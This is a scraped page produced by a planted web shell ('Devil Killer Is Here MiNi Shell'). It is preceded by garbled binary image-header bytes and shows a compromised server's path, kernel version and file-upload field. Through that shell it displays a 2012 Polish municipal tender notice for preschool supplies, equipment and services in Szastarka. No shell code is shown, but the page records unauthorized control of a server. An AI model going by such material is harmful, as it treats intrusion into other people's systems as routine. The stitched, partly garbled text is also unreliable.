JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120811/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120811/174047-N-2012.html

<p class="kh_header"><b>Szastarka: Dostawa pomocy dydaktycznych i zabawek, materiałów remontowych, mebli dziecięcych, sprzętu RTV, wyposażenia sportowego, dostawa i montaż urządzeń placu zabaw oraz usług dydaktycznych dla Punktu Przedszkolnego  -  przy Zespole Szkól w Szastarce na cele realizacji projektu pt. Punkt Przedszkolny -  Zostań przedszkolakie</b><br>
<b>Numer ogłoszenia: 174047 - 2012; data zamieszczenia: 11.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szastarka , 23-225 Szastarka, woj. lubelskie, tel. 015 8714104, faks 015 8714130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych i zabawek, materiałów remontowych, mebli dziecięcych, sprzętu RTV, wyposażenia sportowego, dostawa i montaż urządzeń placu zabaw oraz usług dydaktycznych dla Punktu Przedszkolnego  -  przy Zespole Szkól w Szastarce na cele realizacji projektu pt. Punkt Przedszkolny -  Zostań przedszkolakie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1     WESOŁA   SALA  PRZEDSZKOLAKA  
Część I
dostawa dzienników, wyprawki dla przedszkolaka, zabawek 1 semestr 1 zestaw, wyposażenia kącików tematycznych1 semestr1 zestaw, materiałów dekoracyjnych, tablic korkowych, programów multimedialnych, 
Część II  
dostawa farby malarskiej, gładzi tynkowej, tapety ozdobnej, kleju, rolet okiennych
Część   III  
dostawa szatni, wykładziny dywanowej, stolików i krzeseł przedszkolnych, mebli do kącików tematycznych, leżaków
Część   IV 
dostawa kompletu gniazd zasilających do tablicy interaktywnej, telewizora tv lcd, odtwarzacza dvd, odtwarzacza cd, urządzenia wielofunkcyjnego, laptopa z oprogramowaniem systemowym, projektora multimedialnego, tablicy interaktywnej, aparatu fotograficznego
Część    V 
dostawa ławek, materacy, akcesoriów sportowych, zestawu gimnastycznego, urządzeń zabawowych na plac zabaw wraz z montażem
Część   VI
 Świadczenie usług edukacyjnych nauka języka angielskiego, prowadzenie zajęć rytmiki,Zajęcia  logopedyczne, według  opisu zawartego  w SIWZ.

ZADANIE 2 AKTYWNYM I ŚWIADOMYM RODZICEM BYĆ 
Część  VII  konsultacje z psychologiem dla rodziców
Zajęcia będą odbywały się od 01.09.2012 r. do 30.06.2013 i od 01.08.2013 r. do 30.06.2014 r. Liczebność osób w grupach na poszczególnych zajęciach, będzie się kształtowała następująco 
- zajęcia logopedyczne: do 4 osób łącznie 2 grupy uczestników
- rytmika do 20 osób w grupie 1 grupa uczestników 
-język angielski do 10 osób w grupie łącznie 2 grupy uczestników 
- konsultacje z psychologiem dla rodziców spotkania indywidualne. 
Godzina zajęć dodatkowych, będzie trwała 60 minut. W uzasadnionych przypadkach dopuszcza się prowadzenie zajęć w czasie krótszym niż 60 minut, zachowując ustalony dla dziecka łączny czas zajęć. 
Metodologia wyliczenia liczby godzin zajęć dodatkowych w projekcie, w podziale na poszczególne typy wsparcia. 
- zajęcia logopedyczne 3 godziny w tygodniu  2 grupy  4 tygodnie  20 m-cy 480 godzin łącznie 
  w ramach projektu dołączyć  stosowne dokumenty uprawniające  do sprawowania usług logopedycznych w dziećmi przedszkolnymi
- rytmika 2 godziny w tygodniu  1 grupa  4 tygodnie 20 m cy 160 godzin łącznie w ramach  projektu. wymagane wykształcenie średnie lub wyższe muzyczne, specjalny kurs z rytmiki,  poświadczone odpowiednimi  dokumentami
- język angielski 2 godziny tygodniowo  2 grupy 4 tygodnie  20 mcy 320 godzin łącznie w ramach projektu dołączyć stosowne dokumenty uprawniające do nauki języka angielskiego 
Konsultacje będą prowadzone  od  1 .09.2012  r.  do 30. VI. 2014 r.
Zadanie  dedykowane jest dla rodziców dzieci objętych wsparciem projektu. Ma na celu uświadomienie rodziców na temat  korzyści, jakie będą płynąć  dla ich pociech z edukacji przedszkolnej  oraz zaktywizowanie rodziców w zakresie partycypacji w edukacji ich dzieci. Wspólne zajęcia będą uwieńczane zdjęciami, albumem przedszkolaka 1szt1semestr. W ramach zadania  będą organizowane
a raz na kwartał spotkania z rodzicami mające na celu promowania wychowania  przedszkolnego, poinformowanie rodziców o postępach edukacyjnych  dzieci, planach nauczania na kolejny okres  1 3 miesiące
b dni otwarte w przedszkolu 1 miesiąc podczas których rodzice będą mogli uczestniczyć wspólnie z ich dziećmi w zajęciach, zabawach. Tym samym będą mogli zyskać świadomość nt. zachowania ich dzieci w przedszkolu, porozmawiać  z nauczycielem wychowania przedszkolnego. W ramach tych zajęć rodzice otrzymają pracę domową na miesiąc tj. zadania, które wykonają razem z dzieckiem      w domu, celem wsparcia ich w  dotychczasowej edukacji
c konsultacje z psychologiem 3 dyżurymies 4h 1h60min mają na celu udzielenie pomocy rodzicom w rozwiązywaniu problemów wychowawczych, uświadomienie rodzicom celowości włączenia się przez nich w proces edukacyjny  dzieci;
d uroczystości z udziałem rodziców Dzień Mamy, Taty, pasowanie na przedszkolaka, rozpoczęcie roku i zakończenie roku nauki etc.

Zajęcia w Punkcie Przedszkolnym będą  odbywać się  od 01.09.2012 do 30.06.2013 r  i od 01.08.2013 do 30.o6.2014 przy  Zespole Szkół  w Szastarce.
Punkt przedszkolny czynny  9h  od7 00 do16 00 od poniedziałku  do piątku.
Zajęcia dla nowej grupy  Przedszkolnej   w wieku 3 i 4 l. będą   realizowane  zgodnie  z obowiązującą w tym zakresie podstawą programową , tj. zajęcia dydaktyczne, wychowawcze i opiekuńcze; 
Zajęcia z rytmiki prowadzone przez nauczyciela rytmiki 1tydz 2h), w ramach których będą wprowadzane piosenki tematycznie zw. z planem pracy nauczyciela - dostosowane do aktualnej pory roku oraz elementy tańców ludowych i współczesnych  prowadzony będzie cykl zajęć umuzykalniających mających na celu kształcenie dyscypliny rytmicznej oraz uwrażliwienie na różne elementy muzyki oraz ćwiczenia, których celem jest rozwijanie twórczej inwencji dziecka         improwizacje ruchowe śpiewane i grane. Głównym  celem tych zajęć  jest wypracowanie u dzieci samodzielności wypowiedzi, twórczej postawy i aktywności, pozwalającej na pozbycie się zahamowań.
Zajęcia z języka  angielskiego 2tydz2h głównym  celem zajęć  jest wprowadzenie dzieci w świat nauki języka  obcego poprzez aktywną zabawę, połączoną z dużą ilością ruchu, atrakcyjne gry, piosenki, rymowanki i historyjki. Metody pracy zabawy ruchowe z wykorzystaniem piosenki, ćwiczenia  gimnastyczne, w okręgu zgadywanki  z użyciem kart obrazkowych, zabawy plastyczne
Opiekę logopedyczną 2tydz3h 1h60min Zajęcia prowadzone indywidualnie i grupowo. Logopeda będzie informował  o wynikach swoich obserwacji i współpracy z dziećmi rodziców dzieci oraz będzie wskazywał rodzicom możliwe sposoby zoptymalizowania efektów jego pracy w domu rodzinnym odpowiednie ćwiczenia  wykonywane przez dziecko w domu pod okiem rodzica  Nie przewiduje się wydłużenia godzin pracy Punktu Przedszkolnego godz. 7 00 16 00 
Godzina zajęć dodatkowych, będzie trwała 60 minut. W uzasadnionych przypadkach dopuszcza się prowadzenie zajęć w czasie krótszym niż 60 minut, zachowując ustalony dla dziecka łączny czas zajęć.
Do obowiązków  wykonawców prowadzących zajęcia należy Oznakowanie miejsc oraz wszelkich dokumentów związanych z organizacją zajęć, zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach POKL przestrzegania wytycznych dotyczących oznaczenia projektu w ramach POKL oraz współpraca z koordynatorem i przedstawicielami Zamawiającego. 
Umożliwienie Zamawiającemu lub osobom upoważnionym przez Zamawiającego wizytowania podczas zajęć.
Prawidłowe i terminowe wykonywanie zadań
Troska o prawidłowy rozwój i bezpieczeństwo dzieci. 
Współdziałanie z Dyrektorem Zespołu Szkół w Szastarce,  w  której odbywają się zajęcia, w zakresie wszelkich spraw  związanych z prowadzeniem zajęć. 
Współpraca z rodzicami dzieci. 
Dbanie o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu oraz ponoszenia odpowiedzialności materialnej za powierzone mienie. 
Przestrzeganie obowiązujących przepisów prawa oświatowego i statutu  szkoły .
Wykonywanie innych zadań wynikających z przepisów prawa, w tym w szczególności z dokumentów 
Załącznik Nr 1 wraz z załączonymi formularzami cenowymi dla poszczególnych części zamówienia Załącznik Nr  1a1b 1c 1d1e opisane w treści siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 37.77.77.77-8, 30.19.20.00-1, 44.11.14.00-5, 24.91.00.00-6, 39.51.54.10-2, 39.16.10.00-8, 39.00.00.00-2, 39.53.10.00-3, 32.32.00.00-2, 38.65.10.00-3, 37.41.41.00-4, 39.22.11.22-8, 80.00.00.00-0, 80.42.80.00-0, 80.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy
1Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2	Posiadają wiedzę i doświadczenie
3	Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
4	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
5	nie podlegający wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
6	złożą formularz ofertowy wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami,
7	spełniają wymagania określone ustawą Prawo zamówień publicznych oraz wymogi określone w  specyfikacji istotnych warunków zamówienia.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnianie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach stanowiących ofertę, zgodnie z niniejszą SIWZ.
6.2  Z postępowania o udzielenie zamówienia wyklucza się
1wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując     je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu, które uprawomocniło się w okresie 3 lat przed wszczęciem postępowania
2wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono,
3wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne,
4osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzie?lenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego,
5spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału   w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa  lub przestępstwa skarbowego,
6spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, prze?stępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego,
7spółki komandytowe oraz spółki komandyt, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego,
8osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano  za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego,
9podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary,
10	wykonawców, którzy wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, 
11wykonawców, którzy nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Pzp, albo   nie zgodzili się na przedłużenie okresu związania ofertą,
12wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ lub mogące mieć wpływ  na wynik prowadzonego postępowania,
13wykonawców, którzy nie wykazali spełniania warunków udziału w postępowaniu

Oferta wykonawcy wykluczonego z postępowania  uznana zostanie za odrzuconą.

6.3  Zamawiający odrzuci ofertę, jeżeli
1	 jest niezgodna z ustawą,
2	 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
3	 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
4	 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5	 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6 zawiera błędy w obliczeniu ceny, 
7	 wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp,
8 jest nieważna na podstawie odrębnych przepisów. 
7.	Informacje o oświadczeniach i dokumentach.
7.1 Na ofertę składają się następujące dokumenty i załączniki
1	Wypełniony i podpisany Formularz ofertowy główny z wykorzystaniem wzoru Załącznik Nr 1, wraz z załączonymi formularzami cenowymi dla poszczególnych części zamówienia Załącznik Nr  1a,1b, 1c, 1d, 1e,
2	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - Załącznik Nr 2 i Załącznik nr 2a
3	Parafowany przez wykonawcę Formularz postanowień umowy z wykorzystaniem wzoru - Załącznik Nr 3
4	Dokumenty wymienione w pkt 7.2.siwz

7.2  W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust.1 ustawy Pzp wykonawca przedkłada
1	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy,
2	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,
3	Certyfikaty zgodności kompletnych mebli, szatni, sprzętu do wyposażenia placu zabaw. Stolików, krzesełek-zgodnie z wymogami bezpieczeństwa. W przypadku zabawek niezbędna jest deklaracja zgodności CE, nie wymagane są certyfikaty.

7.3 Postanowienia dotyczące składanych dokumentów.
1	Oferta powinna zawierać wszystkie wymagane dokumenty, oświadczenia i załączniki, o których mowa w niniejszej specyfikacji.
2	Oferta oraz wszystkie wymagane załączniki winny być podpisane przez upoważnionego przedstawiciela, uprawnionego do reprezentowania zgodnie z przedstawionym aktem rejestracyjnym, wymogami ustawowymi oraz przepisami prawa. 
3	Wykonawców obowiązuje wykorzystanie załączonych wzorów dokumentów - załączników. Wszystkie pola i pozycje tych wzorów winny być wypełnione, a w szczególności muszą zawierać wszystkie wymagane informacje i dane oraz odpowiedzi na wszystkie pytania. Nie dopuszcza się składania alternatywnych co do treści dokumentów. 
4	Wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii poświadczonej  za zgodność z oryginałem przez osobę/osoby uprawnione do podpisania oferty, z dopiskiem   za zgodność z oryginałem. 
5	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
6	Złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów   lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania spowoduje wykluczenie wykonawcy z dalszego postępowania.
7.4 Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmiotów gospodarczych konsorcjaspółki cywilne
1Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich wykonawców, przy czym termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia.
2	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i zawarcia umowy,  a pełnomocnictwo upoważnienie do pełnienia takiej funkcji - wystawione zgodnie    z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów - winno być dołączone do oferty.
3	Oferta winna być podpisana przez każdego partnera lub ustanowionego pełnomocnika.
4	Ustanowiony pełnomocnik winien być upoważniony do zaciągania zobowiązań i płatności  w imieniu każdego partnera, na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu.
5	Oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w pkt 7.1 p.pkt 2 i pkt 7.2 SIWZ dla każdego partnera z osobna, pozostałe zaś składane są wspólnie.
7.5 Postanowienia dotyczące wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej.
1	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów określonych w pkt 7.2 p.pkt 3 6 specyfikacji istotnych warunków zamówienia składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że 
a	nie otwarto jego likwidacji ani nie ogłoszono upadłości
b	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
c.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2	Dokumenty, których mowa 7.5.1a i c powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 7.5.1b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
